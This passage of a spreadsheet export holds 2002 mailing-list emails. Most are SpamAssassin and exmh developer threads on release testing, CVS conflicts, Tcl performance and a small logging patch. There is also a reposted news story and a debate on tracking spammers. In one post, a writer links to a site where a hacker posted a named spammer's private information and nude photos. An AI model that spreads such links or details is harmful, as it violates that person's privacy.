    <t>Justin Mason wrote:\n\n&gt; What do you all think?  are we ready to go?  anyone run into any trouble\n&gt; with the new autoconf code, or found a bug from the merge of that spamc\n\nI am now preparing a small patch to configure.in for NetBSD (possibly\nalso useful for Open- and FreeBSD, don't know). Should be ready and\ntested in the next half hour.\n\nIf you think 2.40 is ready, I would suggest to wait just 24 hours more\nfor possible reports by b2_4_0 users. Not everyone can follow the\ndevelopment during daytime (at work).\n\n\nciao\n     Klaus\n\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by: Jabber - The world's fastest growing \nreal-time communications platform! Don't just IM. Build it in! \n[URL]http://www.jabber.com[/URL]\n_______________________________________________\nSpamassassin-devel mailing list\nSpamassassin-devel@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>http://www.jabber.com https://lists.sourceforge.net</t>
  </si>
  <si>
    <t>NLD</t>
  </si>
  <si>
    <t>To: Chris Garrigues &lt;cwg-dated-1030994748.7b01dd@DeepEddy.Com&gt;\nFrom: Brent Welch &lt;welch@panasas.com&gt;\nDate: Wed, 28 Aug 2002 22:40:21 -0700</t>
  </si>
  <si>
    <t>Wed, 28 Aug 2002 22:40:21 -0700</t>
  </si>
  <si>
    <t>Chris Garrigues &lt;cwg-dated-1030994748.7b01dd@DeepEddy.Com&gt;</t>
  </si>
  <si>
    <t>Re: New Sequences Window</t>
  </si>
  <si>
    <t>Well, I've used the check-the-modify-time cache trick for files in many places (not just exmh) so some part of me certainly thinks it is effective.  However, it occurred to me that if we do checkpoint state, then aren't we modifying the sequences file for the current folder on every message read?  Perhaps we look at the sequences file more than once per message view?  Just idle speculation - we can stick in some time calls to find out how expensive things are. Someone asked about increasing the time resolution in the exmh log. We could make that conditional on some support available in 8.3 - Tcl has had "clock seconds" (like gettimeofday) and "clock clicks" (high resolution timer) for some time.  But in 8.3 we've calibrated clock clicks values to microseconds.  It is still only useful for relative times, but each call to Exmh_Log could emit the microsecond delta since the last log record.  Of course, we are measuring all the overhead of taking the log record, etc.  I'll try it out. &gt;&gt;&gt;Chris Garrigues said:  &gt; &gt; From:  Brent Welch   &gt; &gt; Date:  Wed, 28 Aug 2002 10:32:42 -0700  &gt; &gt;  &gt; &gt;   &gt; &gt; &gt;&gt;&gt;Robert Elz said:  &gt; &gt;  &gt; Mh_Sequence also goes and rereads the files (.mh_sequences and the  &gt; &gt;  &gt; context file) but I'm not sure how frequently that one is called.  &gt; &gt;   &gt; &gt; In some places I maintain caches of files by checking their modify  &gt; time,  &gt; &gt; but the sequence files are soo small that by the time you stat them to  &gt; &gt; check their date stamp, you could just read them again.  &gt;   &gt; Do you really think this is true?  I added a modify time check thinking  &gt; that   &gt; it would make an improvement since we were reading it a *lot* more times  &gt; in   &gt; the new code because we're trying to use the sequences.  &gt;   &gt; On the other hand, the sequences files are probably being read out of  &gt; cache   &gt; when that happens anyway.  &gt;   &gt; Even with a small file, I'd think that the time taken to do a   &gt; [file mtime $filename] would be worth it.  My code is in proc  &gt; MhReadSeqs.  &gt;   &gt; Chris  &gt;   &gt; --   &gt; Chris Garrigues                 [URL]http://www.DeepEddy.Com[/URL]  &gt; virCIO                          [URL]http://www.virCIO.Com[/URL]  &gt; 716 Congress, Suite 200  &gt; Austin, TX  78701		+1 512 374 0500  &gt;   &gt;   World War III:  The Wrong-Doers Vs. the Evil-Doers.  &gt;   &gt;  -- Brent Welch Software Architect, Panasas Inc Pioneering the World's Most Scalable and Agile Storage Network [URL]www.panasas.com[/URL] welch@panasas.com _______________________________________________ Exmh-workers mailing list Exmh-workers@redhat.com [URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>http://www.DeepEddy.Com http://www.virCIO.Com www.panasas.com https://listman.redhat.com</t>
  </si>
  <si>
    <t>To: SpamAssassin-devel@example.sourceforge.net\nFrom: Jesus Climent &lt;jesus.climent@hispalinux.es&gt;\nDate: Wed, 28 Aug 2002 22:27:56 +0200</t>
  </si>
  <si>
    <t>Wed, 28 Aug 2002 22:27:56 +0200</t>
  </si>
  <si>
    <t>Jesus Climent &lt;jesus.climent@hispalinux.es&gt;</t>
  </si>
  <si>
    <t>Re: [SAdev] 2.40: ready for release? *NO*</t>
  </si>
  <si>
    <t>--k3qmt+ucFURmlhDS\nContent-Type: text/plain; charset=us-ascii\nContent-Disposition: inline\nContent-Transfer-Encoding: quoted-printable\n\nOn Wed, Aug 28, 2002 at 07:42:13PM +0100, Justin Mason wrote:\n&gt; OK guys -- I reckon it's now Good Enough, modulo some minor score\n&gt; tweaking, or commenting of some more broken/high-FP-ing rules.\n&gt;=20\n\nSome make test errors here, too:\n\nFailed 6/20 test scripts, 70.00% okay. 17/182 subtests failed, 90.66% okay.\n\nJ\n\n--=20\nJesus Climent | Unix System Admin | Helsinki, Finland.\n[URL]http://www.HispaLinux.es[/URL]  |  data.pandacrew.org\n------------------------------------------------------\nPlease, encrypt mail address to me: GnuPG ID: 86946D69\nFP: BB64 2339 1CAA 7064 E429  7E18 66FC 1D7F 8694 6D69\n------------------------------------------------------\nRegistered Linux user #66350 Debian 3.0 &amp; Linux 2.4.19\n\nLook at my fingers: four stones, four crates. Zero stones? ZERO CRATES!\n		--Zorg (The Fifth Element)\n\n--k3qmt+ucFURmlhDS\nContent-Type: application/pgp-signature\nContent-Disposition: inline\n\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.0.6 (GNU/Linux)\nComment: For info see [URL]http://www.gnupg.org[/URL]\n\niD8DBQE9bTJMZvwdf4aUbWkRAkpYAKDp15ePjG0prpbb/JSMICw6X3xOegCdGsU8\ntdax7QmKey5Vul5DwFDESVc=\n=lyD1\n-----END PGP SIGNATURE-----\n\n--k3qmt+ucFURmlhDS--\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by: Jabber - The world's fastest growing \nreal-time communications platform! Don't just IM. Build it in! \n[URL]http://www.jabber.com[/URL]\n_______________________________________________\nSpamassassin-devel mailing list\nSpamassassin-devel@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>http://www.HispaLinux.es http://www.gnupg.org http://www.jabber.com https://lists.sourceforge.net</t>
  </si>
  <si>
    <t>To: "Theo Van Dinter" &lt;felicity@kluge.net&gt;,\nFrom: "Sidney Markowitz" &lt;sidney@sidney.com&gt;\nDate: Wed, 28 Aug 2002 21:49:49 -0700</t>
  </si>
  <si>
    <t>Wed, 28 Aug 2002 21:49:49 -0700</t>
  </si>
  <si>
    <t>"Sidney Markowitz" &lt;sidney@sidney.com&gt;</t>
  </si>
  <si>
    <t>"Theo Van Dinter" &lt;felicity@kluge.net&gt;,</t>
  </si>
  <si>
    <t>&gt; It's this section of spamassassin.raw: &gt; &gt; &lt;&lt;&lt;&lt;&lt;&lt;&lt; spamassassin.raw [...snip]       } &gt; =3D=3D=3D=3D=3D=3D=3D [... snip ...] &gt; &gt;&gt;&gt;&gt;&gt;&gt;&gt; 1.68.2.10 [...snip...] This is what cvs puts in when you modify the copy of the file on your disk and someone checks in a change and then you pull an update and cvs can't figure out how to merge your changes and the checked in changes. The lines between the &lt;&lt;&lt;&lt;&lt;&lt; and the ===== are in your file and the ones in the next section are what have been checked in. You must have not noticed the warning messages about conflicts that cvs gave you when you did the update, and the "C" flag next to that file when cvs listed the files being pulled.  -- sidney ------------------------------------------------------- This sf.net email is sponsored by:ThinkGeek Welcome to geek heaven. [URL]http://thinkgeek.com[/URL] _______________________________________________ Spamassassin-devel mailing list Spamassassin-devel@lists.sourceforge.net [URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: Chris Garrigues &lt;cwg-dated-1030976555.34ad5b@DeepEddy.Com&gt;\nFrom: Robert Elz &lt;kre@munnari.OZ.AU&gt;\nDate: Wed, 28 Aug 2002 21:44:26 +0700</t>
  </si>
  <si>
    <t>Wed, 28 Aug 2002 21:44:26 +0700</t>
  </si>
  <si>
    <t>Robert Elz &lt;kre@munnari.OZ.AU&gt;</t>
  </si>
  <si>
    <t>Chris Garrigues &lt;cwg-dated-1030976555.34ad5b@DeepEddy.Com&gt;</t>
  </si>
  <si>
    <t>Date:        Wed, 28 Aug 2002 09:22:34 -0500     From:        Chris Garrigues      Message-ID:  &lt;1030544555.28815.TMDA@deepeddy.vircio.com&gt;   | so I'll probably poke around at the sequences performance issues, Well, there's this wonderful piece of code in MhSeqExpand ...     # Hack to weed out sequence numbers for messages that don't exist     foreach m $rseq {         if ![file exists $mhProfile(path)/$folder/$m] {             Exmh_Debug $mhProfile(path)/$folder/$m not found             set ix [lsearch $seq $m]             set seq [lreplace $seq $ix $ix]         } else {             # Real hack             break         }     } which is going to run slow if a sequence happens to start with a bunch of messages that don't exist.   I'm not sure why it is important that the first message in the sequence returned exists, but not necessarily any of the others, but I'm sure glad it is, as MhSeqExpand gets called lots, and I don't know if I could cope if it were checking every file in the sequences it is looking at, all the time... It may help to keep a list of the valid message numbers for the current folder (though that would then need to be verified against changes to the directory).   Does tcl have a directory read function?   I assume so... Mh_Sequence also goes and rereads the files (.mh_sequences and the context file) but I'm not sure how frequently that one is called.   | I'll email anything I figure out since I'm leaving town in less    | than 48 hours. Have a good vacation. kre _______________________________________________ Exmh-workers mailing list Exmh-workers@redhat.com [URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>https://listman.redhat.com</t>
  </si>
  <si>
    <t>To: Chris Garrigues &lt;cwg-dated-1030460647.7351a3@DeepEddy.Com&gt;\nFrom: Robert Elz &lt;kre@munnari.OZ.AU&gt;\nDate: Wed, 28 Aug 2002 21:06:30 +0700</t>
  </si>
  <si>
    <t>Wed, 28 Aug 2002 21:06:30 +0700</t>
  </si>
  <si>
    <t>Chris Garrigues &lt;cwg-dated-1030460647.7351a3@DeepEddy.Com&gt;</t>
  </si>
  <si>
    <t>Date:        Thu, 22 Aug 2002 10:04:06 -0500     From:        Chris Garrigues      Message-ID:  &lt;1030028647.6462.TMDA@deepeddy.vircio.com&gt;   | hmmm, I assume you're going to report this to the nmh folks? It turns out, when I did some investigation, that my memory of how MH worked here was wrong (that's not unusual) - the -seq switch seems to have always done -nolist (requiring a subsequent -list to turn it on again). Given that, I have no idea how the pick code as it was ever worked.  In fact, it quite possibly never did the way it was intended to (I have just been browsing the 2.5 sources, and that seems to be attempting to do things that I never saw happen). It may be that your new sequence method just exposed the bug that had been there all along. Given this, I won't be sending any bug reports to the nmh people.  If nmh ever seems to be showing any signs further progress, and if I remember this then, I might send them a change request.   The code to make the change is trivial. kre _______________________________________________ Exmh-workers mailing list Exmh-workers@redhat.com [URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>To: &lt;spamassassin-talk@example.sourceforge.net&gt;\nFrom: "Ken" &lt;ken@ramblernet.com&gt;\nDate: Wed, 28 Aug 2002 20:52:25 -0400</t>
  </si>
  <si>
    <t>Wed, 28 Aug 2002 20:52:25 -0400</t>
  </si>
  <si>
    <t>"Ken" &lt;ken@ramblernet.com&gt;</t>
  </si>
  <si>
    <t>&lt;spamassassin-talk@example.sourceforge.net&gt;</t>
  </si>
  <si>
    <t>[SAtalk] Having a problem</t>
  </si>
  <si>
    <t>Now that I have spam assassin and mailscanner working, how can I have smap\ndeleted rather than forwarded?\n\nI changed spam.actions.conf to "default	delete" but it is still sending it\nto the recipient.\n\nThanks,\nKen\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Forteana List" &lt;zzzzteana@yahoogroups.com&gt;\nFrom: "Matt Cardier" &lt;mcardier@hotmail.com&gt;\nDate: Wed, 28 Aug 2002 20:42:14 +1000</t>
  </si>
  <si>
    <t>Wed, 28 Aug 2002 20:42:14 +1000</t>
  </si>
  <si>
    <t>"Matt Cardier" &lt;mcardier@hotmail.com&gt;</t>
  </si>
  <si>
    <t>"Forteana List" &lt;zzzzteana@yahoogroups.com&gt;</t>
  </si>
  <si>
    <t>[zzzzteana] Compensation for World's youngest mother</t>
  </si>
  <si>
    <t>[URL]http://www.cnn.com[/URL]\n\nLIMA, Peru (Reuters) -- Lina Medina's parents thought their 5-year-old daughter had a huge abdominal tumor and when shamans in their remote village in Peru's Andes could find no cure, her father carried her to hospital. \n\nJust over a month later, she gave birth to a boy. \n\nAged 5 years, seven months and 21 days old when her child was born by Caesarean section in May 1939, Medina made medical history, and is still the youngest known mother in the world. \n\nAt the time, Peru's government promised aid that never materialized. Six decades on, Medina lives with her husband in a cramped house in a poor, crime-ridden district of the Peruvian capital known as "Little Chicago." \n\nNow 68, she keeps herself to herself and has long refused requests to rake up the past. Gerardo, the son she delivered while still a child herself, died in 1979 at the age of 40. \n\nBut a new book, written by an obstetrician who has been interested in her case, has drawn fresh attention to Medina's story, and raised the prospect that the Peruvian government may belatedly offer her financial and other assistance. \n\n"The government condemned them to live in poverty. In any other country, they would be the objects of special care," Jose Sandoval, author of "Mother Aged 5," told Reuters. \n\n"We still have time to repair the damage done to her. That's my fundamental objective," he added. \n\n'Totally willing to help'\nSandoval has raised Medina's case with the office of first lady Eliane Karp, and has asked the government to grant her a life pension -- something officials say is possible. \n\n"We're totally willing to help her," said spokeswoman Marta Castaneda. But Suni Ramos, of the social action department of Karp's office, said that before the government could grant her a pension or any other of the aid it was already planning -- such as kitchen and other household equipment -- it needed to talk to her to discuss what she wanted and needed. It is currently trying to contact Medina and her family. \n\nMedina's husband, Raul Jurado, told Reuters his wife remained skeptical. "She got no help (in 1939) that I know about," he said. "She thinks governments never deliver. Maybe today there will be a promise that will never come true." \n\nJurado said his wife, whose story is a medical textbook classic and whose case is confirmed as true by such bodies as the American College of Obstetricians and Gynecologists, had turned down Reuters' request for an interview. \n\nMedical rarity\nNo one has ever established who was the father of Medina's child, or confirmed she became pregnant after being raped. \n\nOne of nine children born to country folk in Ticrapo, an Andean village at an altitude of 7,400 feet (2,250 meters) in Peru's poorest province, Medina is believed to be the youngest case of precocious puberty in history, Sandoval said. \n\nHe said she had her first period at 2 1/2, became pregnant aged 4 years and eight months and that when doctors performed the Caesarean to deliver her baby, they found she already had fully mature sexual organs. \n\nHer swelling stomach worried her parents. "They thought it was a tumor," he said. But shamans ruled out village superstitions -- including one in which locals believed a snake grew inside a person until it killed them -- and recommended they take her to hospital in the nearest big town, Pisco. \n\nThere came the staggering diagnosis that she was pregnant. \n\nHer father was jailed temporarily on suspicion of incest -- he was later released for lack of evidence -- and doctors, police and even a film crew set off for her village for preliminary investigations into her case. \n\nSandoval, who based his book on media and other published information, and some interviews with relatives as Medina herself declined to comment, said news of the child mother-to-be drew instant offers of aid, including one worth $5,000 from a U.S. businessman, which was turned down. \n\nMore offers followed after Medina was transferred to a Lima hospital, where her fully developed 6-pound (2.7 kg) baby was born on May 14, 1939 -- Mother's Day. \n\nOne offer was worth $1,000 a week, plus expenses, for Medina and her baby to be exhibited at the World's Fair in New York. Another, from a U.S. business that the family accepted in early June 1939, was for the pair to travel to the United States for scientists to study the case. The offer included setting up a fund to ensure their lifelong financial comfort. \n\nBut within days, the state trumped all previous offers, decreeing that Medina and her baby were in "moral danger," and resolving to set up a special commission to protect them. \n\nBut Sandoval said: "It abandoned the case after six months ...It did absolutely nothing for them." \n\nHappy ending?\nThough physically mature, Medina -- who Sandoval said was mentally normal and showed no other unusual medical symptoms -- still behaved like a child, preferring to play with her dolls instead of the new baby, who was fed by a wet nurse. \n\nMedina stayed in hospital for 11 months, finally returning to her family after it began legal proceedings that led to a Supreme Court ruling allowing her to live with them again. \n\nAfter taunting from schoolmates, Gerardo -- who was named after one of the doctors who attended Medina and became their mentor -- discovered when he was 10 that the woman he had grown up believing to be his sister was in fact his mother. \n\nHe died in 1979 from a disease that attacks the body's bone marrow, but Sandoval said it was not clear there was any link with his illness and the fact his mother had been so young. \n\nMedina married and in 1972 had a second son, 33 years after her first. Her second child now lives in Mexico. \n\nShe appears to have turned her bizarre story into a taboo subject. "We just want to get on with our lives, that's it," said Jurado, adding he thought "absolutely nothing" of the fact his wife was the world's youngest mother. \n\nHe said the couple's main concern now, if the government's offer of aid was genuine, was to be granted the value of a property that belonged to Medina and which the then-government expropriated more than two decades ago. That house has now been destroyed and there is a road on the site. \n\nHe said its value was "more or less $25,000" and settling the property question would conclude a long legal battle to get back a home of their own -- they live now in a modest house, accessed down a dingy alley half blocked by a wooden board, in a tough neighborhood known to locals as a thieves' paradise. \n\n"If the government really wants to help...they should give us the value of our property," he said. \n\nAs for Sandoval, he said he was optimistic that Medina's story, which he has studied since his student days, would turn out well. "I believe there will be a happy ending," he said. \n\n"As a result of the war, corporations have now been enthroned and an era\nof corruption in high places will follow and the money-power of the\ncountry will endeavor to prolong its reign by working upon the\nprejudices of the people until the wealth is aggregated in a few hands\nand the Republic is destroyed."\nAbraham Lincoln (Nov 21, 1864 in a letter to Col. William F Elkins)\n\n\n\n\n\n[Non-text portions of this message have been removed]\n\n\n------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;\n4 DVDs Free +s&amp;p Join Now\n[URL]http://us.click.yahoo.com[/URL]\n---------------------------------------------------------------------~-&gt;\n\nTo unsubscribe from this group, send an email to:\nforteana-unsubscribe@egroups.com\n\n \n\nYour use of Yahoo! Groups is subject to [URL]http://docs.yahoo.com[/URL]</t>
  </si>
  <si>
    <t>http://www.cnn.com http://us.click.yahoo.com http://docs.yahoo.com</t>
  </si>
  <si>
    <t>To: &lt;spamassassin-talk@example.sourceforge.net&gt;\nFrom: "Dan Kohn" &lt;dan@dankohn.com&gt;\nDate: Wed, 28 Aug 2002 20:09:49 -0700</t>
  </si>
  <si>
    <t>Wed, 28 Aug 2002 20:09:49 -0700</t>
  </si>
  <si>
    <t>"Dan Kohn" &lt;dan@dankohn.com&gt;</t>
  </si>
  <si>
    <t>RE: [SAtalk] O.T. Habeus -- Why?</t>
  </si>
  <si>
    <t>Guys, the Habeas Infringers List (HIL) exists explicitly to deal with spammers while we're getting judgments against them and especially in other countries, where those judgments are harder to get. Please note that nobody has ever had an incentive before to go after regular spammers.  Yes, some attorneys general have prosecuted blatant pyramid schemes, and ISPs have won some theft of service suits, but the vast majority of spammers go forward with out any legal hassles.  So, I can't understand how Daniel can assert that you can't track spammers down when it's never really been tried.  We can subpoena the records of the business they spammed on behalf of.  We can subpoena the records of the ISP that provided them service, and of the credit card they used for the whack-a-mole accounts.  We can use private investigators.  Yes, these people are often lowlifes (chickenboners).  But, they're not secret agents.  They're just trying to make a buck, and Habeas' whole business is about finding them and putting them out of business Habeas has the incentive to pursue spammers (that use our warrant mark) in a way that no one ever has had before.  Given that our whole business plan relies on Habeas becoming synonymous with "not spam", I can't understand why you would assume ahead of time that we will be unsuccessful, plan for that failure, and in so doing, remove the potential of success, which is anti-spam filters like SA acting on the Habeas warrant mark. Daniel, it's easy enough for you to change the Habeas scores yourself on your installation.  If Habeas fails to live up to its promise to only license the warrant mark to non-spammers and to place all violators on the HIL, then I have no doubt that Justin and Craig will quickly remove us from the next release.  But, you're trying to kill Habeas before it has a chance to show any promise. At the end of the day, SpamAssassin is like the Club, in that it encourages thieves (spammers) to just go after the next car (those without SA) rather than yours.  Habeas can play the role of LoJack (the transmitter), in enabling the apprehension of thieves so that they don't steal any more cars.  But only if we're given a chance to succeed.           - dan -- Dan Kohn     -----Original Message----- From: Daniel Quinlan [mailto:quinlan@pathname.com]  Sent: Wednesday, August 28, 2002 16:38 To: Matthew Cline Cc: spamassassin-talk@example.sourceforge.net Subject: Re: [SAtalk] O.T. Habeus -- Why? Matthew Cline  writes: &gt; There must be *some* way of tracking a spammer down, since they are &gt; planning on making money from the spam.  What a court would consider &gt; evidence of being the spammer is another question. Haha!!! Just a few notes:  - It will be difficult to find, prosecute, and win money from someone    in various non-friendly countries where spam originates (China is a    good example) even if they do officially "respect" copyright law.  - Law suits take time. Between now and conclusion of the first court    case, we could have years of spam in our mail boxes!  - Contact information can change: phone numbers, PO boxes, stolen    cell phones, temporary email addresses, etc.  - Spammers do not always remember to include contact information!  I    don't understand it either, but nobody said they were bright.  Also,    some spam is non-commercial or sent by a third-party (for example,    "pump and dump" stock scams), so contact information is not strictly    required for the spammer to get their way. Dan ------------------------------------------------------- This sf.net email is sponsored by: Jabber - The world's fastest growing  real-time communications platform! Don't just IM. Build it in!  [URL]http://www.jabber.com[/URL] _______________________________________________ Spamassassin-talk mailing list Spamassassin-talk@lists.sourceforge.net [URL]https://lists.sourceforge.net[/URL] ------------------------------------------------------- This sf.net email is sponsored by: Jabber - The world's fastest growing  real-time communications platform! Don't just IM. Build it in!  [URL]http://www.jabber.com[/URL] _______________________________________________ Spamassassin-talk mailing list Spamassassin-talk@lists.sourceforge.net [URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>http://www.jabber.com https://lists.sourceforge.net http://www.jabber.com https://lists.sourceforge.net</t>
  </si>
  <si>
    <t>To: SpamAssassin-devel@example.sourceforge.net\nFrom: yyyy@spamassassin.taint.org (Justin Mason)\nDate: Wed, 28 Aug 2002 19:42:13 +0100</t>
  </si>
  <si>
    <t>Wed, 28 Aug 2002 19:42:13 +0100</t>
  </si>
  <si>
    <t>yyyy@spamassassin.taint.org (Justin Mason)</t>
  </si>
  <si>
    <t>[SAdev] 2.40: ready for release?</t>
  </si>
  <si>
    <t>OK guys -- I reckon it's now Good Enough, modulo some minor score\ntweaking, or commenting of some more broken/high-FP-ing rules.\n\nWhat do you all think?  are we ready to go?  anyone run into any trouble\nwith the new autoconf code, or found a bug from the merge of that spamc\nBSMTP-support patch?\n\nI expect there *will* be a 2.41 BTW.\n\n--j.\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by: Jabber - The world's fastest growing \nreal-time communications platform! Don't just IM. Build it in! \n[URL]http://www.jabber.com[/URL]\n_______________________________________________\nSpamassassin-devel mailing list\nSpamassassin-devel@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: spamassassin-talk@example.sourceforge.net\nFrom: Matthew Cline &lt;matt@nightrealms.com&gt;\nDate: Wed, 28 Aug 2002 17:49:37 -0700</t>
  </si>
  <si>
    <t>Wed, 28 Aug 2002 17:49:37 -0700</t>
  </si>
  <si>
    <t>Matthew Cline &lt;matt@nightrealms.com&gt;</t>
  </si>
  <si>
    <t>Re: [SAtalk] O.T. Habeus -- Why?</t>
  </si>
  <si>
    <t>On Wednesday 28 August 2002 04:38 pm, Daniel Quinlan wrote: &gt; Matthew Cline  writes: &gt; &gt; There must be *some* way of tracking a spammer down, since they are &gt; &gt; planning on making money from the spam.  What a court would consider &gt; &gt; evidence of being the spammer is another question. &gt; Haha!!! &gt; Just a few notes: &gt;  - It will be difficult to find, prosecute, and win money from someone &gt;    in various non-friendly countries where spam originates (China is a &gt;    good example) even if they do officially "respect" copyright law. SA (and other filters) could be configured to ignore the SWE mark if it  appears to come from/through China. &gt;  - Spammers do not always remember to include contact information!  I &gt;    don't understand it either, but nobody said they were bright.  Also, &gt;    some spam is non-commercial or sent by a third-party (for example, &gt;    "pump and dump" stock scams), so contact information is not strictly &gt;    required for the spammer to get their way. SA could also be configured so that SWE marks are ignored in messages that  look like third-party spam (like stock scams).  Of course, this would still  mean that "The U.N. is going to invade America!" spams with SWE would get  through.  Probably also need to ignore SWE in messages that look like  Nigerian scams. --  Give a man a match, and he'll be warm for a minute, but set him on fire, and he'll be warm for the rest of his life. ICQ: 132152059 | Advanced SPAM filtering software: [URL]http://spamassassin.org[/URL] ------------------------------------------------------- This sf.net email is sponsored by: Jabber - The world's fastest growing  real-time communications platform! Don't just IM. Build it in!  [URL]http://www.jabber.com[/URL] _______________________________________________ Spamassassin-talk mailing list Spamassassin-talk@lists.sourceforge.net [URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>http://spamassassin.org http://www.jabber.com https://lists.sourceforge.net</t>
  </si>
  <si>
    <t>To: spamassassin-talk@example.sourceforge.net\nFrom: Brian McNett &lt;bmcnett@radparker.com&gt;\nDate: Wed, 28 Aug 2002 17:45:49 -0700</t>
  </si>
  <si>
    <t>Wed, 28 Aug 2002 17:45:49 -0700</t>
  </si>
  <si>
    <t>Brian McNett &lt;bmcnett@radparker.com&gt;</t>
  </si>
  <si>
    <t>On Wednesday, August 28, 2002, at 04:38  PM, Daniel Quinlan wrote:\n\n&gt; Just a few notes:\n&gt;\n&gt;  - It will be difficult to find, prosecute, and win money from someone\n&gt;    in various non-friendly countries where spam originates (China is a\n&gt;    good example) even if they do officially "respect" copyright law.\n\n\nA lot of spam which *appears* to originate from China, and even \na lot which advertises websites hosted there, is sent by, and is \ndone for the benefit of, companies based in the US.  The spam \noften appears to originate there because it's coming from open \nhttp, or squid proxy servers.  It's hosted there because these \nspammers are now persona-non-grata on all US ISPs.  One hardly \nneeds to involve the Chinese government in a case where a US \ncitizen is violating US law.\n\n\n&gt;  - Law suits take time. Between now and conclusion of the first court\n&gt;    case, we could have years of spam in our mail boxes!\n\nThe first court cases were actually concluded years ago. These \ninclude many legal precedents which are used to protect the \nrights of ISPs to block mail, and to terminate service to \nspammers.\n\n&gt;  - Contact information can change: phone numbers, PO boxes, stolen\n&gt;    cell phones, temporary email addresses, etc.\n\nSurprising then, how much information you can find on the \ncurrent whereabouts of long-time spammers like Alan Ralksy of \nDetroit, Michigan.  Ralsky is a guy who even gives interviews to \nthe news media.  If you can connect a specific corpus of spam to \nhim, his street address is well known. Ralsky is a prime \ncandidate for lawsuits in any state with an anti-spam law. \nThomas Cowles is another long-time spammer, but last I heard \nhe'd been jailed for stealing computer equipment from his \nbusiness partner, Eddy Marin (also a long time spammer (You've \nheard of PopLaunch, right?)\n\n&gt;  - Spammers do not always remember to include contact information!  I\n&gt;    don't understand it either, but nobody said they were bright.  Also,\n&gt;    some spam is non-commercial or sent by a third-party (for example,\n&gt;    "pump and dump" stock scams), so contact information is not strictly\n&gt;    required for the spammer to get their way.\n\nBack when I was working at MAPS, there was a flap over a \npump-and-dump spammer, Rodona Garst.  Seems she had an open \nfile-share on her laptop, and when she forged the wrong domain, \nthe real owner hacked in and posted all her private information \non a website. Oh, look, it's still there, including the nude \nphotos:\n\n[URL]http://belps.freewebsites.com[/URL]\n\nI recall this well, because the SEC was VERY interested in \nconfirming the validity of the information found online.  There \nwere some "interesting" conversations. This summer, the SEC \nreleased the following:\n\n[URL]http://www.sec.gov[/URL]\n\nYes, the investigation took two years, but the financial penalty \nfor operating a pump-and-dump scam isn't small.  The wheels of \ngovernment grind slow, but the grind very fine indeed.\n\n--B\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http://belps.freewebsites.com http://www.sec.gov http://www.jabber.com https://lists.sourceforge.net</t>
  </si>
  <si>
    <t>To: exmh-workers@spamassassin.taint.org\nFrom: Robert Elz &lt;kre@munnari.OZ.AU&gt;\nDate: Wed, 28 Aug 2002 17:44:28 +0700</t>
  </si>
  <si>
    <t>Wed, 28 Aug 2002 17:44:28 +0700</t>
  </si>
  <si>
    <t>Patch to enable/disable log</t>
  </si>
  <si>
    <t>While I was playing with the past issues, it annoyed me that there was\nno easy way to make the log stop growing (I don't mean to truncate it,\nI mean to just freeze it for a while).\n\nThe following patch adds a new button to the log window, which allows\nthe log to be switched on/off (the button says "Disable" when the\nlog is enabled, and the button disables it, and "Enable" when the log\nis frozen, and the button enables it again).\n\nkre\n\n--- main.tcl	Wed Aug 21 15:01:48 2002\n+++ /usr/local/lib/exmh-2.5/main.tcl	Wed Aug 28 17:36:59 2002\n@@ -385,6 +385,9 @@\n 	ExmhLogCreate\n 	wm withdraw $exmh(logTop)\n     }\n+    if {! $exmh(logWrite)} {\n+	return\n+    }\n     if [info exists exmh(log)] {\n 	catch {\n #	    $exmh(log) insert end " [bw_delta] "\n@@ -407,6 +410,9 @@\n     set exmh(logWindow) 1\n     Exwin_Toplevel .log "Exmh Log" Log\n     set exmh(logTop) .log\n+    set exmh(logDisableBut) \\n+	[Widget_AddBut $exmh(logTop).but swap "Disable" ExmhLogToggle]\n+    set exmh(logWrite) 1\n     Widget_AddBut $exmh(logTop).but trunc "Truncate" ExmhLogTrunc\n     Widget_AddBut $exmh(logTop).but save "Save To File" ExmhLogSave\n     set exmh(logYview) 1\n@@ -457,6 +463,12 @@\n     } msg] {\n 	Exmh_Status "Cannot save log: $msg" error\n     }\n+}\n+proc ExmhLogToggle {} {\n+    global exmh\n+\n+    set exmh(logWrite) [expr ! $exmh(logWrite)]\n+    $exmh(logDisableBut) configure -text [lindex {"Enable " Disable} $exmh(logWrite)]\n }\n #### Misc\n \n\n\n\n\n_______________________________________________\nExmh-workers mailing list\nExmh-workers@redhat.com\n[URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>To: spamassassin-talk@example.sourceforge.net\nFrom: Jon Gabrielson &lt;jon.g@directfreight.com&gt;\nDate: Wed, 28 Aug 2002 17:35:33 -0500</t>
  </si>
  <si>
    <t>Wed, 28 Aug 2002 17:35:33 -0500</t>
  </si>
  <si>
    <t>Jon Gabrielson &lt;jon.g@directfreight.com&gt;</t>
  </si>
  <si>
    <t>[SAtalk] moving SPAM: results to bottom of message.</t>
  </si>
  <si>
    <t>Is there a way to tell spamassassin to put the results at the bottom\nof the message instead?  If not, what is the easiest way to do this.\nI found a report_header, but no equivalent report_bottom.\n\nThanks,\n\nJon.\njon.g@directfreight.com\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talk@example.sourceforge.net\nFrom: Jim McCullars &lt;jim@info.uah.edu&gt;\nDate: Wed, 28 Aug 2002 17:23:29 -0500 (CDT)</t>
  </si>
  <si>
    <t>Wed, 28 Aug 2002 17:23:29 -0500 (CDT)</t>
  </si>
  <si>
    <t>Jim McCullars &lt;jim@info.uah.edu&gt;</t>
  </si>
  <si>
    <t>[SAtalk] Compile error under Digital Unix</t>
  </si>
  <si>
